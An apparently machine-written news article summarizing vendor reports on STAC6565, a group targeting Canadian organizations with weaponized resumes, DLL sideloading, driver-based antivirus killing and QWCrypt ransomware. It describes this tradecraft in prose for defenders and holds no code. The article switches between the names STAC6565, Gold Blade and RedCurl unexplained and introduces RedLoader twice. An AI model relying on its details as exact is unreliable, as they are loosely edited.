Ethical Hacking News
STAC6565: The Canada-Targeted Ransomware Campaign Blurring the Lines Between Cyber Espionage and Ransomware. In recent months, a sophisticated threat actor known as STAC6565 has been actively targeting Canadian organizations with a campaign of high-profile ransomware attacks.
STAC6565 is a sophisticated threat actor targeting Canadian organizations with high-profile ransomware attacks. The group uses spear-phishing emails, exploiting vulnerabilities in software applications to evade detection. Most attacks target HR personnel, tricking them into opening malicious documents disguised as resumes or cover letters. STAC6565 uses various tools and techniques, including RedLoader, to carry out its attacks and gather sensitive information about the target organization. The group's tactics have been documented by researchers, showing a mix of data theft and selective ransomware deployment via a custom locker named QWCrypt.
In recent months, a sophisticated threat actor known as STAC6565 has been actively targeting Canadian organizations with a campaign of high-profile ransomware attacks. According to cybersecurity experts at Sophos, this particular group has managed to evade detection for quite some time by leveraging recruitment platforms and exploiting vulnerabilities in legitimate software applications.
The primary vector used by STAC6565 involves spear-phishing emails designed to trick HR personnel into opening malicious documents disguised as resumes or cover letters. Since November 2024, the attackers have leveraged popular job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of a job application process. This approach not only increases the likelihood that the documents will be opened but also allows the threat actors to evade detection by traditional email-based protections.
"It's an unusually narrow geographic focus for the group, with almost 80% of attacks targeting Canadian organizations," said Sophos researcher Morgan Demboski. "Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt."
The group's tactics, techniques, and procedures (TTPs) have been extensively documented by researchers at Huntress, eSentire, and Bitdefender. According to these reports, STAC6565 has been observed using various tools and techniques to carry out its attacks.
One notable tool used in the campaign is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory environment. This allows the threat actors to gather sensitive information about the target organization without needing physical access to the network.
Another tool employed by STAC6565 is RedLoader itself, which has been observed in several delivery sequences between September 2024, March/April 2025, and July 2025. These sequences often involve a ZIP archive that contains a Windows shortcut (LNK) file impersonating a PDF. This LNK file uses "rundll32.exe" to fetch a renamed version of "ADNotificationManager.exe" from a WebDAV server hosted behind Cloudflare Workers.
The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named "srvcli.dll" or "netutils.dll") from the same WebDAV path. This DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that's responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file.
These payloads rely on Microsoft's Program Compatibility Assistant ("pcalua.exe") for execution, a technique seen in previous campaigns. The primary difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs.
"The payload parses the malicious .dat file and checks internet connectivity," said Sophos. "It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery... The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products."
The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications.
Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what's called a Bring Your Own Vulnerable Driver (BYOVD) attack. In at least one case, the threat actors renamed both the components before distributing them via SMB shares to all servers in the victim environment.
While most of these attacks were detected and mitigated before the installation of QWCrypt, three of the attacks – one in April and two in July 2025 – led to a successful deployment. In these cases, the attackers manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker.
The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including an organization's hypervisors.
In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. This demonstrates the group's ability to refine its delivery methods and evade detection.
"The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain," said Sophos. "Gold Blade's abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors."
This campaign highlights the evolving nature of ransomware attacks and the blurring of lines between cyber espionage and financially motivated operations.
STAC6565: The Canada-Targeted Ransomware Campaign Blurring the Lines Between Cyber Espionage and Ransomware. In recent months, a sophisticated threat actor known as STAC6565 has been actively targeting Canadian organizations with a campaign of high-profile ransomware attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/STAC6565-The-Canada-Targeted-Ransomware-Campaign-Blurring-the-Lines-Between-Cyber-Espionage-and-Ransomware-ehn.shtml
https://thehackernews.com/2025/12/stac6565-targets-canada-in-80-of.html
Published: Tue Dec 9 04:04:04 2025 by llama3.2 3B Q4_K_M
